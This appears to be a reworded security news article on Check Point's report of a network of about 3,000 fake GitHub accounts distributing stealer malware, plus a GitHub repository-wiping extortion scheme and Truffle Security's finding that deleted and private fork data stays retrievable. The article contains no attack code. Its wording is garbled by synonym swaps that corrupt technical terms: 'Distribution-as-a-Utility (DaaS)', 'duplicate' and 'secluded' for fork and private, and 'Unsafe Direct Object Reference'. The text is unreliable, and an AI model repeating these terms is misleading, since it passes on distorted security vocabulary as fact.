‘Stargazer Goblin’ Initiates 3,000 Bogus GitHub Accounts for Malware Propagation
An individual identified as Stargazer Goblin has constructed a network of fabricated GitHub profiles to drive a Distribution-as-a-Utility (DaaS) service aimed at disseminating various data-stealing malware, raking in an illicit $100,000 in revenue over the last year.
The cluster, incorporating more than 3,000 profiles on the cloud-centric code repository, encompasses a multitude of repositories used for distributing contaminated links or malware, as per Check Point, which has labeled the setup as the “Stargazers Ghost Network.”
Several types of malware strains shared via this approach consist of Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the phony profiles also participating in starring, forking, watching, and subscribing to malevolent repositories to present them as genuine.
The network is thought to have been in operation since August 2022 at a basic level, though an advertisement for the DaaS only came to light in early July 2023.
“Threat actors are now managing a network of ‘Ghost’ profiles that distribute malware through malevolent links on their repositories and encrypted archives as well,” security expert Antonis Terefos stressed in an evaluation published last week.
“This network not just transmits malware but also engages in various other actions that make these ‘Ghost’ profiles appear as legitimate users, providing fake credibility to their activities and the linked repositories.”
Different types of GitHub profiles handle separate aspects of the plot to bolster their system’s resilience against GitHub’s efforts to take down flagged detrimental payloads on the platform.
These entail profiles overseeing the phishing repository template, profiles responsible for providing the image for the phishing template, and profiles pushing malware to the repositories as a password-protected archive masquerading as counterfeit software and game hacks.
If the third batch of profiles is identified and barred by GitHub, Stargazer Goblin updates the initial profile’s phishing repository with a fresh link to an active new malevolent release, permitting the operators to proceed unimpeded.
In addition to liking new releases from multiple repositories and making edits to the README.md files to adjust the download links, there are indications that certain profiles within the network have been previously compromised, likely through the acquisition of login credentials via malware designed to steal them.
“In most cases, we see that Repository and Stargazer profiles remain unaffected by bans and repository takedowns, while Commit and Release profiles are typically banned once their malevolent repositories are detected,” Terefos remarked.
“Link-Repositories with links to banned Release-Repositories are commonly found. When this occurs, the Commit profile tied to the Link-Repository updates the harmful link with a fresh one.”
One of the campaigns unearthed by Check Point involves a devious link to a GitHub repository, which subsequently directs to a PHP script stored on a WordPress site, culminating in delivering an HTML Application (HTA) file to execute Atlantida Stealer through a PowerShell script.
Other varieties of malware spread through the DaaS encompass Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point additionally observed that the GitHub profiles are part of a broader DaaS solution deploying similar ghost profiles across other platforms like Discord, Facebook, Instagram, X, and YouTube.
“Stargazer Goblin has devised an incredibly intricate malware dissemination mechanism that evades detection by leveraging GitHub’s legitimacy, dispels suspicions of malicious operations, and mitigates and recovers from any disruptions caused when GitHub thwarts their network,” Terefos stated.
“By employing multiple profiles and personas carrying out distinct functions from promoting to housing the repository, committing the phishing pattern, and hosting harmful releases, the Stargazers Ghost Network can minimize their losses when GitHub intervenes with their operations, as typically only a segment of the entire operation is affected instead of all associated profiles being disrupted.”
This development is unfolding as unidentified assailants are focusing on GitHub repositories, wiping their content, and instructing victims to contact an individual named Gitloker on Telegram in a new extortion scheme that has been ongoing since February 2024.
The social engineering offensive targets developers through phishing emails dispatched from “notifications@github.com,” aiming to dupe them into interacting with counterfeit links under the pretense of a job opportunity linked to GitHub. Subsequently, they are prompted to authorize a novel OAuth application that deletes all repositories and demands a ransom for restoration of access.
This follows advice from Truffle Security highlighting the potential to extract sensitive information from deleted forks, removed repositories, and even private repositories on GitHub, advising organizations to enhance defenses against what they’re dubbing a Cross Fork Object Reference (CFOR) vulnerability.
“A CFOR vulnerability incurs when one
repository duplicate can retrieve confidential information from another duplicate (including data from secluded and eliminated duplicates),” Joe Leon expressed. “Analogous to an Unsafe Direct Object Reference, in CFOR users provide commit hashes to directly retrieve commit information that would otherwise remain unseen to them.”
Put differently, a code segment committed to a public duplicate might remain accessible perpetually as long as a minimum of one duplicate of that repository exists. Furthermore, it could also serve to retrieve code segments committed between the moment an internal duplicate is generated and when the repository becomes public.
It’s of importance to mention that these are intentional design selections made by GitHub, as indicated by the enterprise in its personal documentation –
- Commits to any repository in a duplicate network can be retrieved from any repository in the same duplicate network, including the parent repository
- Upon converting a secluded repository to public, all the commits in that repository, comprising any commits made in the repositories it was forked into, will become visible to everyone.
“The typical user perceives the partition between secluded and public repositories as a security boundary, and understandably assumes that any data within a secluded repository cannot be retrieved by public users,” Leon expressed.
“Regrettably, […] this is not always accurate. Furthermore, the action of elimination implies the obliteration of data. As seen earlier, erasing a repository or duplicate does not signify that your commit information is genuinely eliminated.”
About Author
